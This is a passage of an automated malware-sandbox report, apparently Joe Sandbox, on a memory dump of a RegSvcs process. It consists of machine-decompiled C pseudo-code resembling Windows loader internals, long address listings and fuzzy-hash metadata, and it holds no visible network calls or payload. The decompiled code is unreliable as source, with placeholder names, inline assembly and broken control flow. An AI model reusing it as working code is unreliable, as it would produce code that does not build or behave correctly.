								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xb38628; // 0x0
							_t116 =  *0xb3862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x00a6b94c
0x00a6b956
0x00a6b95c
0x00a6b95e
0x00a6b964
0x00a6b969
0x00a6b96d
0x00a6b96d
0x00a6b970
0x00a6b974
0x00a6b97a
0x00a6badf
0x00a6badf
0x00a6bae2
0x00a6bae4
0x00a6bae6
0x00a6baf0
0x00ab2cb8
0x00a6baf6
0x00a6baf6
0x00a6baf6
0x00a6bafd
0x00a6bb1f
0x00a6bb1f
0x00a6baff
0x00a6bb00
0x00a6bb00
0x00a6bb03
0x00a6bb03
0x00a6bacb
0x00a6bacf
0x00a6bad0
0x00a6bad1
0x00a6badc
0x00a6badc
0x00a6b980
0x00a6b980
0x00a6b988
0x00a6b98b
0x00a6b98d
0x00a6b990
0x00a6b993
0x00a6b999
0x00a6b99b
0x00a6b9a1
0x00a6b9a5
0x00a6b9aa
0x00a6b9b0
0x00a6b9bb
0x00a6b9c0
0x00a6b9c3
0x00a6b9ca
0x00a6b9cc
0x00a6b9cf
0x00a6b9d3
0x00a6b9d7
0x00a6ba94
0x00a6ba94
0x00a6ba98
0x00a6baa3
0x00ab2ccb
0x00a6baa9
0x00a6baa9
0x00a6baa9
0x00a6bab1
0x00ab2cd5
0x00ab2cdd
0x00ab2cdd
0x00a6babb
0x00a6babc
0x00a6bac2
0x00a6bac3
0x00a6bac3
0x00a6bac6
0x00000000
0x00a6b9dd
0x00a6b9dd
0x00a6b9e7
0x00a6b9e7
0x00a6b9ec
0x00a6b9ec
0x00a6b9f1
0x00a6b9f5
0x00a6b9fa
0x00a6ba00
0x00a6ba0c
0x00a6ba10
0x00a6ba10
0x00a6ba12
0x00a6ba18
0x00000000
0x00000000
0x00a6bb26
0x00a6bb26
0x00a6ba1e
0x00a6ba1e
0x00a6ba23
0x00a6ba25
0x00a6ba2c
0x00a6ba30
0x00a6ba35
0x00a6ba35
0x00a6ba41
0x00a6ba46
0x00a6ba4c
0x00a6ba50
0x00a6ba54
0x00a6ba6a
0x00a6ba6e
0x00a6ba70
0x00a6ba74
0x00a6ba78
0x00a6ba7a
0x00a6ba7c
0x00a6ba8e
0x00a6ba90
0x00a6ba92
0x00a6bb14
0x00a6bb14
0x00a6bb16
0x00a6bb16
0x00000000
0x00a6ba7c
0x00a6bb0a
0x00a6bb0d
0x00000000
0x00000000
0x00000000
0x00a6bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A6B9A5

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: d2ce9cb2b11381096cb21674d691029aa67fdddc5451db29c8357dcb26ed57e8
Instruction ID: 624c7deab7c852e66355a9ebe0a07000f95c7b8de68a4c7ba72202ca0e934078
Opcode Fuzzy Hash: d2ce9cb2b11381096cb21674d691029aa67fdddc5451db29c8357dcb26ed57e8
Instruction Fuzzy Hash: 81514571A28300CFC720DF68C48092ABBF5BB98740F24896EF595C7255DB30EC84CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A5D5E0 Relevance: 1.6, Strings: 1, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00A5D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xb3d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00A56600(0xb352d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xb37b9c; // 0x0
							_t281 = L00A64620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00A8F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xb37b90; // 0x775e0000
								if(_t384 == 0) {
									_t353 =  *0xb37b8c; // 0x522a88
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E00A62280(_t200, 0xb384d8);
									_t277 =  *0xb385f4; // 0x522f78
									_t351 =  *0xb385f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x522f10
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00A5FFB0(_t287, _t353, 0xb384d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00A9CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00A56600(0xb352d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00A57926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xb3b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00ACE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xb38472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xb3b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xb3b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00A62280(_t250, 0xb384d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00A83898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00A5FFB0(_t293, _t353, 0xb384d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00A837F5(_t353, 0);
																}
																E00A80413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00A79B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00A702D6(_t174);
																}
																L00A677F0( *0xb37b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00A7C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00A5EC7F(_t353);
										L00A719B8(_t287, 0, _t353, 0);
										_t200 = E00A4F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xb3b2f8 |  *0xb3b2fc) == 0 || ( *0xb3b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E00A8B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xb3b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00AF6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00AF6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E00A5E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L00A5EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E00A89730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E00A5E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L00A58F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E00A83C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x00a5d5f2
0x00a5d5f5
0x00a5d5f5
0x00a5d5fd
0x00a5d600
0x00a5d60a
0x00a5d60d
0x00a5d617
0x00a5d61d
0x00a5d627
0x00a5d62e
0x00a5d911
0x00a5d913
0x00000000
0x00a5d919
0x00a5d919
0x00a5d919
0x00a5d634
0x00a5d634
0x00a5d634
0x00a5d634
0x00a5d640
0x00a5d8bf
0x00000000
0x00a5d646
0x00a5d646
0x00a5d64d
0x00a5d652
0x00aab2fc
0x00aab2fc
0x00aab302
0x00aab33b
0x00aab341
0x00000000
0x00aab304
0x00aab304
0x00aab319
0x00aab31e
0x00aab324
0x00aab326
0x00aab332
0x00aab347
0x00aab34c
0x00aab351
0x00aab35a
0x00000000
0x00aab328
0x00aab328
0x00000000
0x00aab328
0x00aab326
0x00a5d658
0x00a5d658
0x00a5d65b
0x00a5d665
0x00000000
0x00a5d66b
0x00a5d66b
0x00a5d66b
0x00a5d66b
0x00a5d66d
0x00a5d672
0x00a5d67a
0x00000000
0x00000000
0x00a5d680
0x00a5d686
0x00a5d8ce
0x00a5d8d4
0x00a5d8dd
0x00a5d8e0
0x00a5d68c
0x00a5d691
0x00a5d69d
0x00a5d6a2
0x00a5d6a7
0x00a5d6b0
0x00a5d6b5
0x00a5d6e0
0x00a5d6b7
0x00a5d6b7
0x00a5d6b9
0x00a5d6b9
0x00a5d6bb
0x00a5d6bd
0x00a5d6ce
0x00a5d6d0
0x00a5d6d2
0x00aab363
0x00aab365
0x00000000
0x00aab36b
0x00000000
0x00aab36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00a5d6bf
0x00a5d6bf
0x00a5d6e5
0x00a5d6e7
0x00a5d6e9
0x00a5d6ec
0x00a5d6ec
0x00a5d6ef
0x00a5d6f5
0x00a5d6f9
0x00a5d6fb
0x00a5d6fd
0x00a5d701
0x00a5d703
0x00a5d70a
0x00a5d70a
0x00a5d701
0x00a5d710
0x00a5d710
0x00a5d6c1
0x00a5d6c1
0x00a5d6c6
0x00aab36d
0x00aab36f
0x00000000
0x00aab375
0x00aab375
0x00aab375
0x00000000
0x00aab375
0x00000000
0x00a5d6cc
0x00a5d6d8
0x00a5d6d8
0x00a5d6d8
0x00000000
0x00a5d6c6
0x00a5d6bf
0x00000000
0x00a5d6da
0x00a5d6da
0x00a5d716
0x00a5d71b
0x00a5d720
0x00a5d726
0x00a5d726
0x00a5d72d
0x00000000
0x00a5d733
0x00a5d739
0x00a5d742
0x00a5d750
0x00a5d758
0x00a5d764
0x00a5d776
0x00a5d77a
0x00a5d783
0x00a5d928
0x00a5d92c
0x00a5d93d
0x00a5d944
0x00a5d94f
0x00a5d954
0x00a5d956
0x00a5d95f
0x00a5d961
0x00a5d973
0x00a5d973
0x00a5d956
0x00a5d944
0x00a5d92c
0x00a5d78b
0x00aab394
0x00a5d791
0x00a5d798
0x00aab3a3
0x00aab3bb
0x00aab3bb
0x00a5d7a5
0x00a5d866
0x00a5d870
0x00a5d892
0x00a5d898
0x00a5d89e
0x00a5d8a0
0x00a5d8a6
0x00a5d8ac
0x00a5d8ae
0x00a5d8b4
0x00a5d8b4
0x00a5d8ae
0x00a5d7a5
0x00a5d78b
0x00a5d7b1
0x00aab3c5
0x00aab3c5
0x00a5d7c3
0x00a5d7ca
0x00a5d7e5
0x00a5d7eb
0x00a5d8eb
0x00a5d8ed
0x00000000
0x00a5d8f3
0x00a5d8f3
0x00a5d8f3
0x00000000
0x00a5d8ed
0x00a5d7cc
0x00a5d7cc
0x00a5d7d2
0x00000000
0x00a5d7d4
0x00a5d7d4
0x00a5d7d7
0x00a5d7df
0x00aab3d4
0x00aab3d9
0x00aab3dc
0x00aab3dc
0x00aab3df
0x00aab3e2
0x00aab468
0x00aab46d
0x00aab46f
0x00aab46f
0x00aab475
0x00a5d8f8
0x00a5d8f9
0x00a5d8fd
0x00aab3e8
0x00aab3e8
0x00aab3eb
0x00aab3ed
0x00000000
0x00aab3ef
0x00aab3ef
0x00aab3f1
0x00aab3f4
0x00aab3fe
0x00aab404
0x00aab409
0x00aab40e
0x00aab410
0x00aab410
0x00aab414
0x00aab414
0x00aab41b
0x00aab420
0x00aab423
0x00aab425
0x00aab427
0x00aab42a
0x00aab42d
0x00aab42d
0x00aab42a
0x00aab432
0x00aab436
0x00aab438
0x00aab43b
0x00aab43b
0x00aab449
0x00aab44e
0x00aab454
0x00aab458
0x00aab458
0x00aab45d
0x00000000
0x00aab45d
0x00aab3ed
0x00000000
0x00000000
0x00000000
0x00a5d7df
0x00a5d7d2
0x00a5d7ca
0x00aab37c
0x00aab37e
0x00aab385
0x00aab38a
0x00000000
0x00aab38a
0x00a5d742
0x00a5d7f1
0x00a5d7f8
0x00aab49b
0x00aab49b
0x00a5d800
0x00a5d837
0x00a5d843
0x00a5d845
0x00a5d847
0x00a5d84a
0x00a5d84b
0x00a5d84e
0x00a5d857
0x00a5d818
0x00a5d824
0x00a5d831
0x00aab4a5
0x00aab4ab
0x00aab4b3
0x00aab4b8
0x00aab4bb
0x00000000
0x00aab4c1
0x00aab4c1
0x00aab4c8
0x00000000
0x00aab4ce
0x00aab4d4
0x00aab4e1
0x00aab4e3
0x00aab4e5
0x00000000
0x00aab4eb
0x00aab4f0
0x00aab4f2
0x00a5dac9
0x00a5dacc
0x00a5dacf
0x00a5dad1
0x00a5dd78
0x00a5dd78
0x00a5dcf2
0x00000000
0x00a5dad7
0x00a5dad9
0x00a5dadb
0x00000000
0x00000000
0x00a5dae1
0x00a5dae1
0x00a5dae4
0x00a5dae6
0x00aab4f9
0x00aab4f9
0x00aab500
0x00a5daec
0x00a5daec
0x00a5daf5
0x00a5daf8
0x00a5dafb
0x00a5db03
0x00a5db11
0x00a5db16
0x00a5db19
0x00a5db1b
0x00aab52c
0x00aab531
0x00aab534
0x00a5db21
0x00a5db21
0x00a5db24
0x00a5dcd9
0x00a5dce2
0x00a5dce5
0x00a5dd6a
0x00a5dd6d
0x00000000
0x00a5dd73
0x00aab51a
0x00aab51c
0x00aab51f
0x00aab524
0x00000000
0x00aab524
0x00a5dce7
0x00a5dce7
0x00a5dce7
0x00000000
0x00a5dce7
0x00000000
0x00a5db2a
0x00a5db2c
0x00a5db31
0x00a5db33
0x00a5db36
0x00a5db39
0x00a5db3b
0x00a5db66
0x00a5db66
0x00a5db3d
0x00a5db3d
0x00a5db3e
0x00a5db46
0x00a5db47
0x00a5db49
0x00a5db4c
0x00a5db53
0x00a5db55
0x00a5db58
0x00a5db5a
0x00aab50a
0x00aab50f
0x00aab512
0x00a5db60
0x00a5db60
0x00a5db63
0x00a5db63
0x00000000
0x00a5db63
0x00a5db5a
0x00a5db3b
0x00a5db24
0x00a5db69
0x00a5db69
0x00a5db6c
0x00a5db6f
0x00a5db74
0x00aab557
0x00aab557
0x00aab55e
0x00a5db7a
0x00a5db7c
0x00a5db7f
0x00a5db82
0x00a5db85
0x00000000
0x00a5db8b
0x00a5db8b
0x00a5db8d
0x00a5db9b
0x00a5db9b
0x00a5db9d
0x00a5dba0
0x00a5dba2
0x00a5dba4
0x00a5dba7
0x00a5dba9
0x00a5dbae
0x00a5dbae
0x00a5dbb1
0x00a5dbb4
0x00a5dbb4
0x00a5dbb7
0x00a5dbba
0x00a5dcd2
0x00a5dcd4
0x00000000
0x00a5dbc0
0x00a5dbc0
0x00a5dbd2
0x00a5dbd7
0x00a5dbda
0x00a5dbdd
0x00a5dbdf
0x00000000
0x00a5dbe5
0x00a5dbe5
0x00a5dbee
0x00a5dbf1
0x00aab541
0x00aab544
0x00000000
0x00aab546
0x00aab546
0x00000000
0x00aab546
0x00a5dbf7
0x00a5dbf7
0x00a5dbfd
0x00a5dbfd
0x00a5dbff
0x00a5dc0b
0x00a5dc15
0x00a5dc1b
0x00a5dc1d
0x00a5dc21
0x00a5dc21
0x00a5dc23
0x00a5dc23
0x00a5dc26
0x00a5dc29
0x00a5dc2b
0x00000000
0x00000000
0x00a5dc31
0x00a5dc34
0x00a5dc36
0x00a5dcbf
0x00a5dcbf
0x00a5dcc2
0x00000000
0x00a5dc3c
0x00a5dc41
0x00a5dc43
0x00000000
0x00a5dc45
0x00a5dc45
0x00a5dc47
0x00000000
0x00a5dc4d
0x00a5dc4d
0x00a5dc50
0x00a5dc52
0x00a5dc55
0x00a5dcfa
0x00a5dcfe
0x00a5dd08
0x00a5dd0a
0x00a5dd0c
0x00000000
0x00a5dd12
0x00a5dd15
0x00a5dd2d
0x00a5dd2f
0x00a5dd32
0x00a5dd35
0x00000000
0x00a5dd35
0x00a5dc5b
0x00a5dc5b
0x00a5dc5e
0x00a5dc61
0x00a5dc64
0x00a5dc67
0x00a5dc67
0x00a5dc6a
0x00a5dc6c
0x00a5dc8e
0x00a5dc8e
0x00a5dc91
0x00a5dc93
0x00a5dcce
0x00a5dcce
0x00a5dc95
0x00a5dc9c
0x00a5dc6e
0x00a5dc72
0x00a5dc75
